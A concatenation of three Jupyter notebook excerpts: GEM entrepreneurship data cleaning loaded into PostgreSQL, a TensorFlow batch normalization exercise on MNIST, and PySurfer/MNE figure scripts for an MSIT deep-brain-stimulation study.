Since there are five data points, the one null value can be filled by calculating the mean from four other fear of
failure rate data.
```
#calculating mean failure rate
mean_ffrate=Behavior_and_Attitudes.loc[(Behavior_and_Attitudes["economy"]=="Venezuela") & (Behavior_and_Attitudes["year"]!=2007),:]["Fear of failure rate *"].mean()
print(f"The data is updated with the mean value {mean_ffrate}")
# adding it to the df
Behavior_and_Attitudes["Fear of failure rate *"]=Behavior_and_Attitudes["Fear of failure rate *"].fillna(mean_ffrate)
#Displaying the DF with the changes made
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["economy"]=="Venezuela"]
```
### Entrepreneural intentions--dealing with null value
All the economies that was surveyed in 2001 might not have questions on entrepreneurial intentions and hence the datapoint is null for all 28 economies.
```
#identifying the null values
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["Entrepreneurial intentions"].isna()]
```
### Established Business Ownership- null values
Replaced the single value with the closest data point.
```
Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Established Business Ownership'].isna()]
Behavior_and_Attitudes.loc[Behavior_and_Attitudes['economy']=='Israel']
#Replacing with the closest value.
Behavior_and_Attitudes["Established Business Ownership"]=Behavior_and_Attitudes["Established Business Ownership"].fillna(5.66)
Behavior_and_Attitudes.loc[Behavior_and_Attitudes['economy']=='Israel']
```
### Entrepreneurial employee activity, Motivational Index , Female/Male Opportunity-Driven TEA ,Innovation,High Status to Successful Entrepreneurs, Entrepreneurship as a Good Career Choice, Business Services Sector, High Job Creation Expectation --missing values
These columns have more than 100 missing values and will be only used for plotting purposes.
```
print(f"Missing values in Entrepreneurial Employee Activity is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Entrepreneurial Employee Activity'].isna()])}")
print(f"Missing values in Motivational Index is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Motivational Index'].isna()])}")
print(f"Missing values in Female/Male Opportunity-Driven TEA is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Female/Male Opportunity-Driven TEA'].isna()])}")
print(f"Missing values in Innovation is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Innovation'].isna()])}")
print(f"Missing values in High Status to Successful Entrepreneurs is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['High Status to Successful Entrepreneurs'].isna()])}")
print(f"Missing values in Entrepreneurship as a Good Career Choice is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Entrepreneurship as a Good Career Choice'].isna()])}")
print(f"Missing values in Business Services Sector is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Business Services Sector'].isna()])}")
print(f"Missing values in High Job Creation Expectation is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['High Job Creation Expectation'].isna()])}")
```
### Changing column names
```
Behavior_and_Attitudes.columns = Behavior_and_Attitudes.columns.str.replace(' ','_')
Behavior_and_Attitudes.head()
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"economy":"country"})
Behavior_and_Attitudes.head()
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Fear_of_failure_rate_*":"Fear_of_failure_rate"})
Behavior_and_Attitudes.head()
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Total_early-stage_Entrepreneurial_Activity_(TEA)":"Total_early_stage_Entrepreneurial_Activity"})
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Female/Male_TEA":"Female_Male_TEA"})
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Female/Male_Opportunity-Driven_TEA":"Female_Male_Opportunity_Driven_TEA"})
Behavior_and_Attitudes.head()
conn = psycopg2.connect(
database="postgres", user="postgres", password=f"{password}", host='127.0.0.1', port= '5432'
)
conn.autocommit = True
cursor = conn.cursor()
cursor.execute("SELECT datname FROM pg_database;")
list_database = cursor.fetchall()
dbname = "gem_db"
# try:
if (dbname,) not in list_database:
cur = conn.cursor()
cur.execute('CREATE DATABASE ' + dbname)
cur.close()
conn.close()
print("Creating Database...")
engine = create_engine(f"postgresql://postgres:{password}@localhost:5432/{dbname}")
connection = engine.connect()
print('-'*30)
print("Creating Tables, Please wait...")
print('-'*30)
Behavior_and_Attitudes.to_sql("behavior_and_attitudes",engine)
print("Table Behavior_and_Attitudes created successfully")
connection.close()
print('-'*30)
print("Database is ready to use.")
else:
print("Database is already exists.")
# except:
# print("Something went wrong.")
```
### Getting only the recent data for geoJSON conversion
```
data_2019=Behavior_and_Attitudes.loc[Behavior_and_Attitudes["year"]==2019]
data_2019.count()
#deleting null values
data_2019=data_2019.dropna( axis=1,how='any')
data_2019.count()
data_2019
data_2019.to_csv('Resources/behavior_and_attitudes_2019.csv',index=False)
```
| github_jupyter |
# Batch Normalization – Practice
Batch normalization is most useful when building deep neural networks. To demonstrate this, we'll create a convolutional neural network with 20 convolutional layers, followed by a fully connected layer. We'll use it to classify handwritten digits in the MNIST dataset, which should be familiar to you by now.
This is **not** a good network for classfying MNIST digits. You could create a _much_ simpler network and get _better_ results. However, to give you hands-on experience with batch normalization, we had to make an example that was:
1. Complicated enough that training would benefit from batch normalization.
2. Simple enough that it would train quickly, since this is meant to be a short exercise just to give you some practice adding batch normalization.
3. Simple enough that the architecture would be easy to understand without additional resources.
This notebook includes two versions of the network that you can edit. The first uses higher level functions from the `tf.layers` package. The second is the same network, but uses only lower level functions in the `tf.nn` package.
1. [Batch Normalization with `tf.layers.batch_normalization`](#example_1)
2. [Batch Normalization with `tf.nn.batch_normalization`](#example_2)
The following cell loads TensorFlow, downloads the MNIST dataset if necessary, and loads it into an object named `mnist`. You'll need to run this cell before running anything else in the notebook.
```
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True, reshape=False)
```
# Batch Normalization using `tf.layers.batch_normalization`<a id="example_1"></a>
This version of the network uses `tf.layers` for almost everything, and expects you to implement batch normalization using [`tf.layers.batch_normalization`](https://www.tensorflow.org/api_docs/python/tf/layers/batch_normalization)
We'll use the following function to create fully connected layers in our network. We'll create them with the specified number of neurons and a ReLU activation function.
This version of the function does not include batch normalization.
```
"""
DO NOT MODIFY THIS CELL
"""
def fully_connected(prev_layer, num_units):
"""
Create a fully connectd layer with the given layer as input and the given number of neurons.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param num_units: int
The size of the layer. That is, the number of units, nodes, or neurons.
:returns Tensor
A new fully connected layer
"""
layer = tf.layers.dense(prev_layer, num_units, activation=tf.nn.relu)
return layer
```
We'll use the following function to create convolutional layers in our network. They are very basic: we're always using a 3x3 kernel, ReLU activation functions, strides of 1x1 on layers with odd depths, and strides of 2x2 on layers with even depths. We aren't bothering with pooling layers at all in this network.
This version of the function does not include batch normalization.
```
"""
DO NOT MODIFY THIS CELL
"""
def conv_layer(prev_layer, layer_depth):
"""
Create a convolutional layer with the given layer as input.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param layer_depth: int
We'll set the strides and number of feature maps based on the layer's depth in the network.
This is *not* a good way to make a CNN, but it helps us create this example with very little code.
:returns Tensor
A new convolutional layer
"""
strides = 2 if layer_depth % 3 == 0 else 1
conv_layer = tf.layers.conv2d(prev_layer, layer_depth*4, 3, strides, 'same', activation=tf.nn.relu)
return conv_layer
```
**Run the following cell**, along with the earlier cells (to load the dataset and define the necessary functions).
This cell builds the network **without** batch normalization, then trains it on the MNIST dataset. It displays loss and accuracy data periodically while training.
```
"""
DO NOT MODIFY THIS CELL
"""
def train(num_batches, batch_size, learning_rate):
# Build placeholders for the input samples and labels
inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
labels = tf.placeholder(tf.float32, [None, 10])
# Feed the inputs into a series of 20 convolutional layers
layer = inputs
for layer_i in range(1, 20):
layer = conv_layer(layer, layer_i)
# Flatten the output from the convolutional layers
orig_shape = layer.get_shape().as_list()
layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])
# Add one fully connected layer
layer = fully_connected(layer, 100)
# Create the output layer with 1 node for each
logits = tf.layers.dense(layer, 10)
# Define loss and training operations
model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
# Create operations to test accuracy
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Train and test the network
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for batch_i in range(num_batches):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
# train this batch
sess.run(train_opt, {inputs: batch_xs, labels: batch_ys})
# Periodically check the validation or training loss and accuracy
if batch_i % 100 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images,
labels: mnist.validation.labels})
print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
elif batch_i % 25 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys})
print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))
# At the end, score the final accuracy for both the validation and test sets
acc = sess.run(accuracy, {inputs: mnist.validation.images,
labels: mnist.validation.labels})
print('Final validation accuracy: {:>3.5f}'.format(acc))
acc = sess.run(accuracy, {inputs: mnist.test.images,
labels: mnist.test.labels})
print('Final test accuracy: {:>3.5f}'.format(acc))
# Score the first 100 test images individually. This won't work if batch normalization isn't implemented correctly.
correct = 0
for i in range(100):
correct += sess.run(accuracy,feed_dict={inputs: [mnist.test.images[i]],
labels: [mnist.test.labels[i]]})
print("Accuracy on 100 samples:", correct/100)
num_batches = 800
batch_size = 64
learning_rate = 0.002
tf.reset_default_graph()
with tf.Graph().as_default():
train(num_batches, batch_size, learning_rate)
```
With this many layers, it's going to take a lot of iterations for this network to learn. By the time you're done training these 800 batches, your final test and validation accuracies probably won't be much better than 10%. (It will be different each time, but will most likely be less than 15%.)
Using batch normalization, you'll be able to train this same network to over 90% in that same number of batches.
# Add batch normalization
We've copied the previous three cells to get you started. **Edit these cells** to add batch normalization to the network. For this exercise, you should use [`tf.layers.batch_normalization`](https://www.tensorflow.org/api_docs/python/tf/layers/batch_normalization) to handle most of the math, but you'll need to make a few other changes to your network to integrate batch normalization. You may want to refer back to the lesson notebook to remind yourself of important things, like how your graph operations need to know whether or not you are performing training or inference.
If you get stuck, you can check out the `Batch_Normalization_Solutions` notebook to see how we did things.
**TODO:** Modify `fully_connected` to add batch normalization to the fully connected layers it creates. Feel free to change the function's parameters if it helps.
```
def fully_connected(prev_layer, num_units, is_training):
"""
Create a fully connectd layer with the given layer as input and the given number of neurons.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param num_units: int
The size of the layer. That is, the number of units, nodes, or neurons.
:returns Tensor
A new fully connected layer
"""
layer = tf.layers.dense(prev_layer, num_units, use_bias=False, activation=None)
batch_normalized_layer = tf.layers.batch_normalization(layer, training=is_training)
batch_normalized_layer_relu_layer = tf.nn.relu(batch_normalized_layer)
return batch_normalized_layer_relu_layer
```
**TODO:** Modify `conv_layer` to add batch normalization to the convolutional layers it creates. Feel free to change the function's parameters if it helps.
```
def conv_layer(prev_layer, layer_depth, is_training):
"""
Create a convolutional layer with the given layer as input.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param layer_depth: int
We'll set the strides and number of feature maps based on the layer's depth in the network.
This is *not* a good way to make a CNN, but it helps us create this example with very little code.
:returns Tensor
A new convolutional layer
"""
strides = 2 if layer_depth % 3 == 0 else 1
conv_layer = tf.layers.conv2d(prev_layer, layer_depth*4, 3, strides, 'same', activation=None, use_bias=False)
batch_normalized_conv_layer = tf.layers.batch_normalization(conv_layer, training=is_training)
batch_normalized_conv_layer_relu = tf.nn.relu(batch_normalized_conv_layer)
return batch_normalized_conv_layer_relu
```
**TODO:** Edit the `train` function to support batch normalization. You'll need to make sure the network knows whether or not it is training, and you'll need to make sure it updates and uses its population statistics correctly.
```
def train(num_batches, batch_size, learning_rate):
# Build placeholders for the input samples and labels
inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
labels = tf.placeholder(tf.float32, [None, 10])
is_training = tf.placeholder(tf.bool)
# Feed the inputs into a series of 20 convolutional layers
layer = inputs
for layer_i in range(1, 20):
layer = conv_layer(layer, layer_i, is_training)
# Flatten the output from the convolutional layers
orig_shape = layer.get_shape().as_list()
layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])
# Add one fully connected layer
layer = fully_connected(layer, 100, is_training)
# Create the output layer with 1 node for each
logits = tf.layers.dense(layer, 10)
# Define loss and training operations
model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
# Create operations to test accuracy
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Train and test the network
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for batch_i in range(num_batches):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
# train this batch
sess.run(train_opt, {inputs: batch_xs, labels: batch_ys, is_training: True})
# Periodically check the validation or training loss and accuracy
if batch_i % 100 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images,
labels: mnist.validation.labels,
is_training: False})
print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
elif batch_i % 25 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys,
is_training: False})
print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))
# At the end, score the final accuracy for both the validation and test sets
acc = sess.run(accuracy, {inputs: mnist.validation.images,
labels: mnist.validation.labels,
is_training: False})
print('Final validation accuracy: {:>3.5f}'.format(acc))
acc = sess.run(accuracy, {inputs: mnist.test.images,
labels: mnist.test.labels,
is_training: False})
print('Final test accuracy: {:>3.5f}'.format(acc))
# Score the first 100 test images individually. This won't work if batch normalization isn't implemented correctly.
correct = 0
for i in range(100):
correct += sess.run(accuracy,feed_dict={inputs: [mnist.test.images[i]],
labels: [mnist.test.labels[i]],
is_training: False})
print("Accuracy on 100 samples:", correct/100)
num_batches = 800
batch_size = 64
learning_rate = 0.002
tf.reset_default_graph()
with tf.Graph().as_default():
train(num_batches, batch_size, learning_rate)
```
With batch normalization, you should now get an accuracy over 90%. Notice also the last line of the output: `Accuracy on 100 samples`. If this value is low while everything else looks good, that means you did not implement batch normalization correctly. Specifically, it means you either did not calculate the population mean and variance while training, or you are not using those values during inference.
# Batch Normalization using `tf.nn.batch_normalization`<a id="example_2"></a>
Most of the time you will be able to use higher level functions exclusively, but sometimes you may want to work at a lower level. For example, if you ever want to implement a new feature – something new enough that TensorFlow does not already include a high-level implementation of it, like batch normalization in an LSTM – then you may need to know these sorts of things.
This version of the network uses `tf.nn` for almost everything, and expects you to implement batch normalization using [`tf.nn.batch_normalization`](https://www.tensorflow.org/api_docs/python/tf/nn/batch_normalization).
**Optional TODO:** You can run the next three cells before you edit them just to see how the network performs without batch normalization. However, the results should be pretty much the same as you saw with the previous example before you added batch normalization.
**TODO:** Modify `fully_connected` to add batch normalization to the fully connected layers it creates. Feel free to change the function's parameters if it helps.
**Note:** For convenience, we continue to use `tf.layers.dense` for the `fully_connected` layer. By this point in the class, you should have no problem replacing that with matrix operations between the `prev_layer` and explicit weights and biases variables.
```
def fully_connected(prev_layer, num_units, is_training):
"""
Create a fully connectd layer with the given layer as input and the given number of neurons.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param num_units: int
The size of the layer. That is, the number of units, nodes, or neurons.
:returns Tensor
A new fully connected layer
"""
layer = tf.layers.dense(prev_layer, num_units, activation=None, use_bias=False)
gamma = tf.Variable(tf.ones([num_units]))
beta = tf.Variable(tf.zeros([num_units]))
pop_mean = tf.Variable(tf.zeros([num_units]), trainable=False)
pop_variance = tf.Variable(tf.ones([num_units]), trainable=False)
epsilon = 1e-3
def batch_norm_training():
batch_mean, batch_variance = tf.nn.moments(layer, [0])
decay = 0.99
train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))
train_variance = tf.assign(pop_variance, pop_variance * decay + batch_variance * (1 - decay))
with tf.control_dependencies([train_mean, train_variance]):
return tf.nn.batch_normalization(layer, batch_mean, batch_variance, beta, gamma, epsilon)
def batch_norm_inference():
return tf.nn.batch_normalization(layer, pop_mean, pop_variance, beta, gamma, epsilon)
batch_normalized_output = tf.cond(is_training, batch_norm_training, batch_norm_inference)
return tf.nn.relu(batch_normalized_output)
```
**TODO:** Modify `conv_layer` to add batch normalization to the fully connected layers it creates. Feel free to change the function's parameters if it helps.
**Note:** Unlike in the previous example that used `tf.layers`, adding batch normalization to these convolutional layers _does_ require some slight differences to what you did in `fully_connected`.
```
def conv_layer(prev_layer, layer_depth, is_training):
"""
Create a convolutional layer with the given layer as input.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param layer_depth: int
We'll set the strides and number of feature maps based on the layer's depth in the network.
This is *not* a good way to make a CNN, but it helps us create this example with very little code.
:returns Tensor
A new convolutional layer
"""
strides = 2 if layer_depth % 3 == 0 else 1
in_channels = prev_layer.get_shape().as_list()[3]
out_channels = layer_depth*4
weights = tf.Variable(
tf.truncated_normal([3, 3, in_channels, out_channels], stddev=0.05))
layer = tf.nn.conv2d(prev_layer, weights, strides=[1, strides, strides, 1], padding='SAME')
gamma = tf.Variable(tf.ones([out_channels]))
beta = tf.Variable(tf.zeros([out_channels]))
pop_mean = tf.Variable(tf.zeros([out_channels]), trainable=False)
pop_variance = tf.Variable(tf.ones([out_channels]), trainable=False)
epsilon = 1e-3
def batch_norm_training():
batch_mean, batch_variance = tf.nn.moments(layer, [0, 1, 2], keep_dims=False)
decay = 0.99
train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))
train_variance = tf.assign(pop_variance, pop_variance * decay + batch_variance * (1 - decay))
with tf.control_dependencies([train_mean, train_variance]):
return tf.nn.batch_normalization(layer, batch_mean, batch_variance, beta, gamma, epsilon)
def batch_norm_inference():
return tf.nn.batch_normalization(layer, pop_mean, pop_variance, beta, gamma, epsilon)
batch_normalized_output = tf.cond(is_training, batch_norm_training, batch_norm_inference)
return tf.nn.relu(batch_normalized_output)
```
**TODO:** Edit the `train` function to support batch normalization. You'll need to make sure the network knows whether or not it is training.
```
def train(num_batches, batch_size, learning_rate):
# Build placeholders for the input samples and labels
inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
labels = tf.placeholder(tf.float32, [None, 10])
is_training = tf.placeholder(tf.bool)
# Feed the inputs into a series of 20 convolutional layers
layer = inputs
for layer_i in range(1, 20):
layer = conv_layer(layer, layer_i, is_training)
# Flatten the output from the convolutional layers
orig_shape = layer.get_shape().as_list()
layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])
# Add one fully connected layer
layer = fully_connected(layer, 100, is_training)
# Create the output layer with 1 node for each
logits = tf.layers.dense(layer, 10)
# Define loss and training operations
model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
# Create operations to test accuracy
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Train and test the network
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for batch_i in range(num_batches):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
# train this batch
sess.run(train_opt, {inputs: batch_xs, labels: batch_ys, is_training: True})
# Periodically check the validation or training loss and accuracy
if batch_i % 100 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images,
labels: mnist.validation.labels,
is_training: False})
print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
elif batch_i % 25 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys,
is_training: False})
print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))
# At the end, score the final accuracy for both the validation and test sets
acc = sess.run(accuracy, {inputs: mnist.validation.images,
labels: mnist.validation.labels,
is_training: False})
print('Final validation accuracy: {:>3.5f}'.format(acc))
acc = sess.run(accuracy, {inputs: mnist.test.images,
labels: mnist.test.labels,
is_training: False})
print('Final test accuracy: {:>3.5f}'.format(acc))
# Score the first 100 test images individually. This won't work if batch normalization isn't implemented correctly.
correct = 0
for i in range(100):
correct += sess.run(accuracy,feed_dict={inputs: [mnist.test.images[i]],
labels: [mnist.test.labels[i]],
is_training: False})
print("Accuracy on 100 samples:", correct/100)
num_batches = 800
batch_size = 64
learning_rate = 0.002
tf.reset_default_graph()
with tf.Graph().as_default():
train(num_batches, batch_size, learning_rate)
```
Once again, the model with batch normalization should reach an accuracy over 90%. There are plenty of details that can go wrong when implementing at this low level, so if you got it working - great job! If not, do not worry, just look at the `Batch_Normalization_Solutions` notebook to see what went wrong.
| github_jupyter |
# Figures (Original Submission)
### MSIT Overlay
```
import os
from surfer import Brain
%matplotlib qt4
fs_dir = '/autofs/space/sophia_002/users/EMOTE-DBS/freesurfs'
subj_dir = os.environ["SUBJECTS_DIR"]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Surface parameters.
subject = "fscopy"
surf = "inflated"
hemi = 'lh'
## I/O parameters.
overlay = os.path.join(fs_dir, subject, 'label', 'april2016', 'darpa_msit_overlay-lh.mgz')
color = '#AFFF94'
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Make Figure.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
labels = ['dacc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh', 'dlpfc_3-lh',
'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh', 'pcc-lh', 'racc-lh']
brain = Brain(subject, hemi, surf, background='white')
for label in labels:
label = os.path.join(fs_dir, subject, 'label', 'april2016', '%s.label' %label)
brain.add_label(label, color=color, alpha=1, borders=3)
brain.add_overlay(overlay, min=1.301, max=5, sign='pos', name='msit')
brain.overlays['msit'].pos_bar.visible = False
## Lateral view.
brain.show_view(dict(azimuth=150, roll=90), distance=350)
brain.save_image('plots/manuscript/fig1/msit_overlay_lateral.png')
## Medial view.
brain.show_view('medial', distance=425)
brain.save_image('plots/manuscript/fig1/msit_overlay_medial.png')
import os
from surfer import Brain
%matplotlib qt4
fs_dir = '/media/SZORO/arc-fir/recons/'
brain = Brain('fscopy', 'lh', 'pial', subjects_dir=fs_dir)
# brain.add_label('/media/SZORO/arc-fir/recons/fscopy/label/laus125/superiorfrontal_4-lh.label')
# brain.add_label('/media/SZORO/arc-fir/recons/fscopy/label/laus125/caudalmiddlefrontal_1-lh.label')
# brain.show_view('medial')
brain.add_label('/media/SZORO/EMOTE-DBS/freesurfs/fscopy/label/april2016/dlpfc_2-lh.label')
```
## Figure 2
### Grand Average Topoplots (Time-Domain)
```
import os
import numpy as np
import pylab as plt
from mne import EpochsArray, combine_evoked, grand_average, read_epochs, set_log_level
from mne.channels import read_montage
from mne.filter import low_pass_filter
set_log_level(verbose=False)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
subjects = ['BRTU','CHDR','CRDA','JADE','JASE','M5','MEWA','S2']
analysis = 'resp'
task = 'msit'
h_freq = 50
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
montage = read_montage('standard_1020')
evokeds = []
for subject in subjects:
## Load epochs.
epochs = read_epochs('ave/%s_%s_%s_%s-epo.fif' %(subject,task,h_freq,analysis))
## Update channel names according to montage.
ch_map = dict()
for ch in epochs.ch_names:
ix = [m.lower() for m in montage.ch_names].index(ch.lower())
ch_map[ch] = montage.ch_names[ix]
epochs.rename_channels(ch_map)
## Set montage.
epochs.set_montage(montage)
## Lowpass filter. Reassemble.
data = epochs.get_data()
data = low_pass_filter(data, epochs.info['sfreq'], 15., filter_length='2s', n_jobs=3,)
epochs = EpochsArray(data, epochs.info, epochs.events, epochs.tmin, epochs.event_id, proj=False)
## Compute evoked.
evokeds.append( epochs.average() )
## Compute grand average.
evokeds = grand_average(evokeds)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
if analysis == 'stim':
fig = plt.figure(figsize=(6,6))
ax = plt.subplot2grid((1,1),(0,0))
evokeds.plot_topomap(times = 0.52, cmap='spectral', colorbar=False, average=0.05, axes=ax)
fig = plt.figure(figsize=(6,6))
ax = plt.subplot2grid((1,1),(0,0))
evokeds.plot_topomap(times = 0.52, cmap='spectral', colorbar=True, average=0.05, axes=ax)
elif analysis == 'resp':
fig = plt.figure(figsize=(6,6))
ax = plt.subplot2grid((1,1),(0,0))
evokeds.plot_topomap(times = -0.7, cmap='spectral', colorbar=False, average=0.05, axes=ax)
fig = plt.figure(figsize=(6,6))
ax = plt.subplot2grid((1,1),(0,0))
evokeds.plot_topomap(times = -0.7, cmap='spectral', colorbar=True, average=0.05, axes=ax)
```
### dACC Figure
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## File parameters.
model_name = 'revised'
space = 'source'
label = 'dacc-lh'
freq = 15
## Plotting parameters.
contrasts = ['Interference','DBS']
palettes = [ ['#7b3294','#008837'], ['#0571b0','#ca0020'] ]
annotations = [ ['Control', 'Interference'], ['DBS OFF','DBS ON'] ]
y1, y2 = -0.2, 0.3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Intialize figure.
fig, axes = plt.subplots(2,2,figsize=(12,8),sharey=True)
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
for n, contrast, colors, legends in zip(range(2), contrasts, palettes, annotations):
for m, analysis in enumerate(['stim', 'resp']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
## Load cluster results.
f = os.path.join(space, 'results', '%s_%s_timedomain_results.csv' %(model_name, analysis))
clusters = read_csv(f)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
for i, color, legend in zip(range(2),colors,legends):
ix, = np.where(info[contrast]==i)
mu = data[ix].mean(axis=0)
se = data[ix].std(axis=0) / np.sqrt(len(ix))
axes[n,m].plot(times, mu, linewidth=3, color=color, label=legend)
axes[n,m].fill_between(times, mu-se, mu+se, color=color, alpha=0.2)
## Plot significant clusters.
axes[n,m].set_ylim(-0.2,0.2)
for ix in np.where((clusters.Label==label)&(clusters.Freq==freq)&
(clusters.Contrast==contrast)&(clusters.FDR<0.05))[0]:
tmin, tmax = clusters.loc[ix,'Tmin'], clusters.loc[ix,'Tmax']
axes[n,m].fill_between(np.linspace(tmin,tmax,1e3), y1, y2, color='k', alpha=0.2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
for n in range(2):
for m in range(2):
## Stimulus-locked edits.
if not m:
## Fix axes.
xticks = np.array([0.0, 0.4, 0.9, 1.4])
axes[n,m].set(xticks=xticks, xticklabels=xticks - 0.4,
xlim=(-0.25,1.5), ylim=(y1,y2))
## Add markers.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
axes[n,m].text(x+0.02,y1+np.abs(y1*0.05),s,fontsize=22)
axes[n,m].vlines(x,y1,y2,linestyle='--',alpha=0.3)
## Response-locked edits.
else:
## Fix axes.
xticks = np.array([-1.0, -0.5, 0.0, 0.5, 1.0])
axes[n,m].set(xticks=xticks, xlim=(-1.0, 1.0))
## Add markers
axes[n,m].text(0.02,y1+np.abs(y1*0.05),'Resp',fontsize=22)
axes[n,m].vlines(0.0,y1,y2,linestyle='--',alpha=0.3)
## Add legends above plot.
axes[n,m].legend(loc=1, handlelength=1.2, handletextpad=0.5,
